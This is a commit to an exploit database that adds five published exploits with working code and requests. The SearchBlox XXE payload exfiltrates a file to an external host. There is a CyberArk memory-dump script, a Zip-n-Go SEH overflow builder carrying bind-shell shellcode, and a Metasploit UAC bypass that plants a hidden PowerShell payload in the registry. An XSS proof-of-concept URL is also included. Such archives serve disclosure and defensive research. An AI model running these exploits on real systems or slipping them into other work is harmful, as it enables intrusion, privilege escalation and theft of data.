DB: 2018-06-05

5 changes to exploits/shellcodes R 3.4.4 - Local Buffer Overflow RGui 3.4.4 - Local Buffer Overflow Zip-n-Go 4.9 - Buffer Overflow (SEH) Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit) CyberArk < 10 - Memory Disclosure GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin) GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin) SearchBlox 8.6.7 - XML External Entity Injection EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting
2018-06-05 05:01:52 +00:00 · 2018-06-05 05:01:52 +00:00 · 61159b7f3e
commit 61159b7f3e
parent 072457b6b8
6 changed files with 540 additions and 3 deletions
--- a/exploits/aspx/webapps/44831.txt
+++ b/exploits/aspx/webapps/44831.txt
@ -0,0 +1,16 @@
+# Exploit Title: EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting
+# Date:  2018-06-01
+# Exploit Author: Chris Barretto
+# Vendor Homepage: https://www.emssoftware.com/
+# Software Link: https://docs.emssoftware.com/Content/V44.1_ReleaseNotes.htm
+# Version: Versions prior to 8.0.0.201805210 are vulnerable
+# Tested on: Master Calendar v8.0.0.127
+# CVE : CVE-2018-11628
+
+# 1. Description:
+# Data input into EMS Master Calendar before 8.0.0.201805210 via URL parameters are not properly sanitized,
+# allowing malicious attackers to send a crafted URL and execute code in the context of the user's browser.
+
+#2. Proof of concept:
+# The following PoC URL is available:
+https://example.com/MasterCalendar/RssFeeds.aspx?Name=abc<script>alert('XSS')</script>xyz
--- a/exploits/java/webapps/44827.txt
+++ b/exploits/java/webapps/44827.txt
@ -0,0 +1,68 @@
+# Exploit Title: SearchBlox 8.6.7 Out-Of-Band XML eXternal Entity (OOB-XXE)
+# Exploit Author: Ahmet GUREL, Canberk BOLAT
+# Software Link: https://www.searchblox.com/
+# Version: < = SearchBlox Version 8.6.7
+# Platform: Java
+# Tested on: Windows
+# CVE: CVE-2018-11586
+
+# 1. DETAILS
+
+An XML External Entity attack is a type of attack against an
+application that parses XML input. This attack occurs when XML input
+containing a reference to an external entity is processed by a weakly
+configured XML parser. This attack may lead to the disclosure of
+confidential data, denial of service, server side request forgery,
+port scanning from the perspective of the machine where the parser is
+located, and other system impacts. Reference:
+https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
+
+# 2. PoC:
+
+XML external entity (XXE) vulnerability in /searchblox/api/rest/status in
+SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary
+files or conduct server-side request forgery (SSRF) attacks via a crafted
+DTD in an XML request.
+
+HTTP Request:
+_____________
+
+GET /searchblox/api/rest/status HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101
+Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: JSESSIONID=n9uolja8nwkj15nsv66xjlzci;
+XSRF-TOKEN=6098a021-0e3c-409f-9da0-b895eff3025d; AdsOnPage=5;
+AdsOnSearchPage=5
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Length: 140
+
+<?xml version="1.0" encoding="UTF-8" ?>
+<!DOCTYPE xxe [
+ <!ENTITY % dtd SYSTEM "http://192.168.1.2:7000/ext.dtd">
+%dtd;
+%all;
+%send;]>
+
+#Ext.dtd File :
+_______________
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % file SYSTEM "file:///C:/windows/win.ini">
+<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://192.168.1.2:7000/?%file;
+'>">
+%all;
+
+#HTTP Response:
+_______________
+
+Ahmets-MacBook-Pro:Desktop ahmet$ python -m SimpleHTTPServer 7000
+Serving HTTP on 0.0.0.0 port 7000 ...
+192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /ext.dtd HTTP/1.1" 200 -
+192.168.1.2 - - [03/Jun/2018 15:37:16] "GET
+/?;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files]%20[Mail]%20MAPI=1
+HTTP/1.1" 200 -
--- a/exploits/linux/remote/44829.py
+++ b/exploits/linux/remote/44829.py
@ -0,0 +1,46 @@
+# Exploit Title: CyberArk < 10 - Memory Disclosure
+# Date: 2018-06-04
+# Exploit Author: Thomas Zuk
+# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/
+# Version: < 9.7 and < 10
+# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10
+# CVE: CVE-2018-9842
+
+# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd
+# paste the following bytes into a hexedited file named logon.bin:
+#fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000
+
+
+#!/usr/bin/python
+
+import socket
+import os
+import sys
+
+ip = "10.107.32.21"
+port = 1858
+
+# Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services.
+# The below is a sample login request that is needed to receive the memory
+
+pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00"
+
+
+for iteration in range(0, 110):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((ip, port))
+    s.send(pacli_logon)
+
+    # recieve response
+    s.recv(200)
+    reply = s.recv(1500)
+
+    # write responses to file
+    file = open("cyberark_memory", "a")
+
+    file.write("received: \n")
+    file.write(reply)
+    file.write("\n\n\n")
+    file.close()
+
+    s.close()
--- a/exploits/windows/local/44828.py
+++ b/exploits/windows/local/44828.py
@ -0,0 +1,197 @@
+#!/usr/bin/python
+#----------------------------------------------------------------------------------------------------------#
+# Exploit Title      : Zip-n-Go v4.9 - Local Buffer Overflow (SEH)                                         #
+# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #
+# Vendor Homepage    : http://mc1soft.com/index.shtml                                                      #
+# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe                                          #
+# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                    #
+#----------------------------------------------------------------------------------------------------------#
+
+# Disclosure Timeline:
+# ====================
+# 05-28-18: Contacted vendor, no response 
+# 05-30-18: Contacted vendor again, responded with patch and requested further testing
+# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested
+# 05-31-18: Vendor applied new patch and requested further testing
+# 05-31-18: The new patch nullified the vulnerability
+# 06-03-18: Version 4.95 was released  
+# 06-03-18: Proof of concept exploit published
+
+#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
+#Payload size: 710 bytes
+shellcode =  ""
+shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
+shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
+shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
+shellcode += "\x42\x75\x4a\x49\x39\x6c\x5a\x48\x6e\x62\x43\x30"
+shellcode += "\x45\x50\x73\x30\x61\x70\x6d\x59\x7a\x45\x46\x51"
+shellcode += "\x39\x50\x72\x44\x4e\x6b\x52\x70\x30\x30\x6c\x4b"
+shellcode += "\x52\x72\x56\x6c\x6c\x4b\x73\x62\x37\x64\x4c\x4b"
+shellcode += "\x32\x52\x51\x38\x54\x4f\x6f\x47\x31\x5a\x61\x36"
+shellcode += "\x50\x31\x79\x6f\x4c\x6c\x35\x6c\x31\x71\x51\x6c"
+shellcode += "\x47\x72\x46\x4c\x71\x30\x59\x51\x5a\x6f\x44\x4d"
+shellcode += "\x56\x61\x6b\x77\x38\x62\x69\x62\x72\x72\x43\x67"
+shellcode += "\x6e\x6b\x43\x62\x32\x30\x6c\x4b\x33\x7a\x55\x6c"
+shellcode += "\x6c\x4b\x32\x6c\x34\x51\x34\x38\x6d\x33\x37\x38"
+shellcode += "\x57\x71\x4a\x71\x66\x31\x6c\x4b\x42\x79\x51\x30"
+shellcode += "\x65\x51\x59\x43\x4c\x4b\x52\x69\x45\x48\x6b\x53"
+shellcode += "\x77\x4a\x47\x39\x4e\x6b\x76\x54\x4e\x6b\x46\x61"
+shellcode += "\x58\x56\x36\x51\x59\x6f\x6e\x4c\x49\x51\x4a\x6f"
+shellcode += "\x76\x6d\x35\x51\x68\x47\x57\x48\x49\x70\x62\x55"
+shellcode += "\x48\x76\x56\x63\x31\x6d\x4a\x58\x55\x6b\x73\x4d"
+shellcode += "\x35\x74\x33\x45\x4b\x54\x52\x78\x6c\x4b\x46\x38"
+shellcode += "\x51\x34\x56\x61\x59\x43\x33\x56\x6c\x4b\x76\x6c"
+shellcode += "\x50\x4b\x4e\x6b\x46\x38\x75\x4c\x67\x71\x68\x53"
+shellcode += "\x6c\x4b\x34\x44\x4e\x6b\x47\x71\x78\x50\x4b\x39"
+shellcode += "\x47\x34\x57\x54\x55\x74\x33\x6b\x33\x6b\x55\x31"
+shellcode += "\x31\x49\x50\x5a\x42\x71\x4b\x4f\x4b\x50\x31\x4f"
+shellcode += "\x31\x4f\x72\x7a\x4c\x4b\x54\x52\x6a\x4b\x6c\x4d"
+shellcode += "\x31\x4d\x62\x48\x46\x53\x50\x32\x77\x70\x43\x30"
+shellcode += "\x72\x48\x70\x77\x30\x73\x35\x62\x43\x6f\x50\x54"
+shellcode += "\x70\x68\x72\x6c\x71\x67\x67\x56\x47\x77\x49\x6f"
+shellcode += "\x68\x55\x6e\x58\x4c\x50\x43\x31\x45\x50\x53\x30"
+shellcode += "\x46\x49\x78\x44\x33\x64\x62\x70\x50\x68\x76\x49"
+shellcode += "\x4f\x70\x42\x4b\x43\x30\x69\x6f\x69\x45\x73\x5a"
+shellcode += "\x67\x78\x31\x49\x42\x70\x6a\x42\x59\x6d\x71\x50"
+shellcode += "\x32\x70\x73\x70\x36\x30\x70\x68\x78\x6a\x36\x6f"
+shellcode += "\x69\x4f\x6d\x30\x6b\x4f\x69\x45\x4f\x67\x63\x58"
+shellcode += "\x47\x72\x47\x70\x36\x71\x31\x4c\x6c\x49\x59\x76"
+shellcode += "\x70\x6a\x74\x50\x31\x46\x61\x47\x45\x38\x4f\x32"
+shellcode += "\x69\x4b\x54\x77\x35\x37\x79\x6f\x6a\x75\x66\x37"
+shellcode += "\x51\x78\x4d\x67\x39\x79\x37\x48\x59\x6f\x39\x6f"
+shellcode += "\x6a\x75\x62\x77\x61\x78\x43\x44\x68\x6c\x37\x4b"
+shellcode += "\x68\x61\x69\x6f\x4a\x75\x70\x57\x5a\x37\x52\x48"
+shellcode += "\x74\x35\x32\x4e\x52\x6d\x45\x31\x39\x6f\x4a\x75"
+shellcode += "\x71\x78\x71\x73\x30\x6d\x32\x44\x65\x50\x4f\x79"
+shellcode += "\x69\x73\x36\x37\x32\x77\x36\x37\x70\x31\x7a\x56"
+shellcode += "\x51\x7a\x56\x72\x53\x69\x36\x36\x7a\x42\x49\x6d"
+shellcode += "\x43\x56\x78\x47\x33\x74\x31\x34\x37\x4c\x67\x71"
+shellcode += "\x46\x61\x6e\x6d\x53\x74\x34\x64\x62\x30\x6a\x66"
+shellcode += "\x65\x50\x71\x54\x66\x34\x52\x70\x72\x76\x36\x36"
+shellcode += "\x32\x76\x31\x56\x70\x56\x30\x4e\x53\x66\x52\x76"
+shellcode += "\x31\x43\x32\x76\x52\x48\x64\x39\x38\x4c\x65\x6f"
+shellcode += "\x4f\x76\x49\x6f\x78\x55\x4b\x39\x49\x70\x50\x4e"
+shellcode += "\x53\x66\x31\x56\x79\x6f\x34\x70\x50\x68\x65\x58"
+shellcode += "\x4e\x67\x57\x6d\x63\x50\x79\x6f\x38\x55\x4d\x6b"
+shellcode += "\x68\x70\x78\x35\x6d\x72\x62\x76\x72\x48\x6d\x76"
+shellcode += "\x4d\x45\x6f\x4d\x4f\x6d\x39\x6f\x4b\x65\x37\x4c"
+shellcode += "\x77\x76\x71\x6c\x46\x6a\x6f\x70\x39\x6b\x4d\x30"
+shellcode += "\x74\x35\x33\x35\x6f\x4b\x61\x57\x77\x63\x52\x52"
+shellcode += "\x50\x6f\x32\x4a\x73\x30\x32\x73\x6b\x4f\x78\x55"
+shellcode += "\x41\x41"
+
+####################### ZIP File Structure ######################## 
+###################################################################
+######################## Local File Header ########################
+LocalFileHeader  = '\x50\x4b\x03\x04' # local file header signature
+LocalFileHeader += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
+LocalFileHeader += '\x00\x00'         # general purpose bit flag
+LocalFileHeader += '\x00\x00'         # compression method
+LocalFileHeader += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
+LocalFileHeader += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
+LocalFileHeader += '\x00\x00\x00'     # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
+LocalFileHeader += '\x00\x00\x00\x00' # compressed size
+LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
+LocalFileHeader += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes 
+LocalFileHeader += '\x00\x00'         # extra field length
+LocalFileHeader += '\x00'             # file name
+#LocalFileHeader += '\x00'             # extra filed 
+################## Central Directory File Header ##################
+CDFileHeader     = '\x50\x4b\x01\x02' # cd file header signature 
+CDFileHeader    += '\x14\x00'         # version made by 0x14 = 20 -> 2.0
+CDFileHeader    += '\x14\x00'         # version needed to extract 0x14 = 20 -> 2.0
+CDFileHeader    += '\x00\x00'         # general purpose bit flag
+CDFileHeader    += '\x00\x00'         # compression method 
+CDFileHeader    += '\xb7\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
+CDFileHeader    += '\xce\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
+CDFileHeader    += '\x00\x00\x00\x00' # CRC-32
+CDFileHeader    += '\x00\x00\x00\x00' # compressed size
+CDFileHeader    += '\x00\x00\x00\x00' # uncompressed size
+CDFileHeader    += '\xe4\x0f'         # file name length 0x0fe4 = 4068 bytes
+CDFileHeader    += '\x00\x00'         # extra field length
+CDFileHeader    += '\x00\x00'         # file comment length 
+CDFileHeader    += '\x00\x00'         # disk number where file starts
+CDFileHeader    += '\x01\x00'         # internal file attributes BIT 0: apparent ASCII/text file
+CDFileHeader    += '\x24\x00\x00\x00' # external file attributes 
+CDFileHeader    += '\x00\x00\x00\x00' # relative offset of local file header
+#CDFileHeader    += '\x00'             # file name
+#CDFileHeader    += '\x00'             # extra field 
+#CDFileHeader    += '\x00'             # file comment 
+################ End of Central Directory Record ##################
+EOCDRHeader      = '\x50\x4b\x05\x06' # End of central directory signature
+EOCDRHeader     += '\x00\x00'         # number of this disk 
+EOCDRHeader     += '\x00\x00'         # disk where central directory starts 
+EOCDRHeader     += '\x01\x00'         # number of central directory records on this disk 
+EOCDRHeader     += '\x01\x00'         # total number of central directory records 
+EOCDRHeader     += '\x12\x10\x00\x00' # size of central directory 0x1012 = 4114 bytes
+EOCDRHeader     += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive 
+EOCDRHeader     += '\x00\x00'         # comment length 
+#EOCDRHeader     += '\x00'             # comment 
+ 
+Witchcraft  = '\x54'                      # PUSH ESP          * save stack pointer
+Witchcraft += '\x5F'                      # POP EDI
+Witchcraft += '\x54'                      # PUSH ESP          * calculate offset for decoder  
+Witchcraft += '\x58'                      # POP EAX
+Witchcraft += '\x05\x11\x21\x11\x11'      # ADD EAX,11112111
+Witchcraft += '\x05\x11\x21\x11\x11'      # ADD EAX,11112111
+Witchcraft += '\x2D\x53\x25\x22\x22'      # SUB EAX,22222553
+Witchcraft += '\x50'                      # PUSH EAX
+Witchcraft += '\x5C'                      # POP ESP
+
+#https://github.com/ihack4falafel/Slink
+#root@kali:/opt/Slink# python Slink.py                        * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'
+#Enter your shellcode: 9089FC89F8058C050000FFE0
+#[+] Shellcode size is divisible by 4
+#[+] Encoding [e0ff0000]..
+#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
+Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
+Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
+Witchcraft += "\x05\x11\x11\x77\x61" ## add  eax, 0x61771111
+Witchcraft += "\x05\x11\x11\x66\x51" ## add  eax, 0x51661111
+Witchcraft += "\x05\x11\x11\x55\x61" ## add  eax, 0x61551111
+Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
+Witchcraft += "\x50"                 ## push eax
+#[+] Encoding [058c05f8]..
+#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
+Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
+Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
+Witchcraft += "\x05\x74\x13\x46\x13" ## add  eax, 0x13461374
+Witchcraft += "\x05\x64\x13\x45\x13" ## add  eax, 0x13451364
+Witchcraft += "\x05\x53\x12\x34\x12" ## add  eax, 0x12341253
+Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
+Witchcraft += "\x50"                 ## push eax
+#[+] Encoding [89fc8990]..
+#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..
+Witchcraft += "\x25\x4A\x4D\x4E\x55" ## and  eax, 0x554e4d4a
+Witchcraft += "\x25\x35\x32\x31\x2A" ## and  eax, 0x2a313235
+Witchcraft += "\x05\x41\x44\x76\x44" ## add  eax, 0x44764441
+Witchcraft += "\x05\x41\x44\x65\x44" ## add  eax, 0x44654441
+Witchcraft += "\x05\x41\x34\x54\x34" ## add  eax, 0x34543441
+Witchcraft += "\x2D\x33\x33\x33\x33" ## sub  eax, 0x33333333
+Witchcraft += "\x50"                 ## push eax
+
+Evil  = '\x41' * 3066                     # offset to shellcode 
+Evil += shellcode                         # bind shell  
+Evil += '\x43' * (716-len(shellcode))     # shellcode host
+Evil += Witchcraft                        # magic! 
+Evil += '\x42' * (126-len(Witchcraft))    # witchcraft host
+Evil += '\x74\x80\x75\x80'                # nSEH - short jump backward (jump net)
+Evil += '\x6e\x4c\x40\x00'                # SEH  - pop ecx, pop ebp, retn in zip-n-go.exe 
+Evil += '\x41' * (4064-3908-4-4)
+Evil += '.txt'
+
+buffer  = LocalFileHeader
+buffer += Evil
+buffer += CDFileHeader
+buffer += Evil
+buffer += EOCDRHeader  
+
+try:
+	f=open("Evil.zip","w")
+	print "[+] Creating %s bytes evil payload.." %len(Evil)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except Exception as e:
+	print e
--- a/exploits/windows/local/44830.rb
+++ b/exploits/windows/local/44830.rb
@ -0,0 +1,205 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::Powershell
+  include Post::Windows::Priv
+  include Post::Windows::Registry
+  include Post::Windows::Runas
+
+  SLUI_DEL_KEY          = "HKCU\\Software\\Classes\\exefile".freeze
+  SLUI_WRITE_KEY        = "HKCU\\Software\\Classes\\exefile\\shell\\open\\command".freeze
+  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
+  EXEC_REG_VAL          = ''.freeze # This maps to "(Default)"
+  EXEC_REG_VAL_TYPE     = 'REG_SZ'.freeze
+  SLUI_PATH             = "%WINDIR%\\System32\\slui.exe".freeze
+  CMD_MAX_LEN           = 16383
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)',
+        'Description'   => %q{
+          This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under
+          the Current User hive, and inserting a custom command that will get invoked when any binary
+          (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable
+          to file handler hijacking. When we run slui.exe with changed Registry key
+          (HKCU:\Software\Classes\exefile\shell\open\command), it will run our custom command as Admin
+          instead of slui.exe.
+
+          The module modifies the registry in order for this exploit to work. The modification is
+          reverted once the exploitation attempt has finished.
+
+          The module does not require the architecture of the payload to match the OS. If
+          specifying EXE::Custom your DLL should call ExitProcess() after starting the
+          payload in a different process.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+          'bytecode-77', # UAC bypass discovery and research
+          'gushmazuko', # MSF & PowerShell module
+        ],
+        'Platform'      => ['win'],
+        'SessionTypes'  => ['meterpreter'],
+        'Targets'       => [
+          ['Windows x86', { 'Arch' => ARCH_X86 }],
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
+        ],
+        'DefaultTarget' => 0,
+        'References'    => [
+          [
+            'URL', 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation',
+            'URL', 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1'
+          ]
+        ],
+        'DisclosureDate' => 'Jan 15 2018'
+      )
+    )
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled?
+      CheckCode::Appears
+    else
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    # Validate that we can actually do things before we bother
+    # doing any more work
+    check_permissions!
+
+    commspec = 'powershell'
+    registry_view = REGISTRY_VIEW_NATIVE
+    psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
+
+    # Make sure we have a sane payload configuration
+    if sysinfo['Architecture'] == ARCH_X64
+      if session.arch == ARCH_X86
+        # On x64, check arch
+        commspec = '%WINDIR%\\Sysnative\\cmd.exe /c powershell'
+        if target_arch.first == ARCH_X64
+          # We can't use absolute path here as
+          # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
+          psh_path = "powershell.exe"
+        end
+      end
+      if target_arch.first == ARCH_X86
+        # Invoking x86, so switch to SysWOW64
+        psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
+      end
+    else
+      # if we're on x86, we can't handle x64 payloads
+      if target_arch.first == ARCH_X64
+        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
+      end
+    end
+
+    if !payload.arch.empty? && (payload.arch.first != target_arch.first)
+      fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
+    end
+
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
+    end
+
+    payload_value = rand_text_alpha(8)
+    psh_path = expand_path(psh_path)
+
+    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
+    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
+
+    if psh_payload.length > CMD_MAX_LEN
+      fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
+    end
+
+    psh_stager = "\"IEX (Get-ItemProperty -Path #{SLUI_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
+    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
+
+    existing = registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
+    exist_delegate = !registry_getvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?
+
+    if existing.empty?
+      registry_createkey(SLUI_WRITE_KEY, registry_view)
+    end
+
+    print_status("Configuring payload and stager registry keys ...")
+    unless exist_delegate
+      registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
+    end
+
+    registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
+    registry_setvaldata(SLUI_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
+
+    # Calling slui.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
+    cmd_path = expand_path(commspec)
+    cmd_args = expand_path("Start-Process #{SLUI_PATH} -Verb runas")
+    print_status("Executing payload: #{cmd_path} #{cmd_args}")
+
+    # We can't use cmd_exec here because it blocks, waiting for a result.
+    client.sys.process.execute(cmd_path, cmd_args, 'Hidden' => true)
+
+    # Wait a copule of seconds to give the payload a chance to fire before cleaning up
+    # TODO: fix this up to use something smarter than a timeout?
+    sleep(3)
+
+    handler(client)
+
+    print_status("Cleaining ...")
+    unless exist_delegate
+      registry_deleteval(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
+    end
+    if existing.empty?
+      registry_deletekey(SLUI_DEL_KEY, registry_view)
+    else
+      registry_setvaldata(SLUI_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
+    end
+    registry_deleteval(SLUI_WRITE_KEY, payload_value, registry_view)
+  end
+
+  def check_permissions!
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    end
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+    # Check if you are an admin
+    # is_in_admin_group can be nil, true, or false
+    print_status('UAC is Enabled, checking level...')
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+  end
+end
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -9714,7 +9714,7 @@ id,file,description,date,author,type,platform,port
 44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86,
 44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86,
 44499,exploits/windows_x86/local/44499.py,"Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)",2018-04-23,"Marwan Shamel",local,windows_x86,
-44516,exploits/windows/local/44516.py,"R 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows,
+44516,exploits/windows/local/44516.py,"RGui 3.4.4 - Local Buffer Overflow",2018-04-24,bzyo,local,windows,
 44518,exploits/windows/local/44518.py,"Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)",2018-04-24,T3jv1l,local,windows,
 44523,exploits/linux/local/44523.rb,"lastore-daemon D-Bus - Privilege Escalation (Metasploit)",2018-04-24,Metasploit,local,linux,
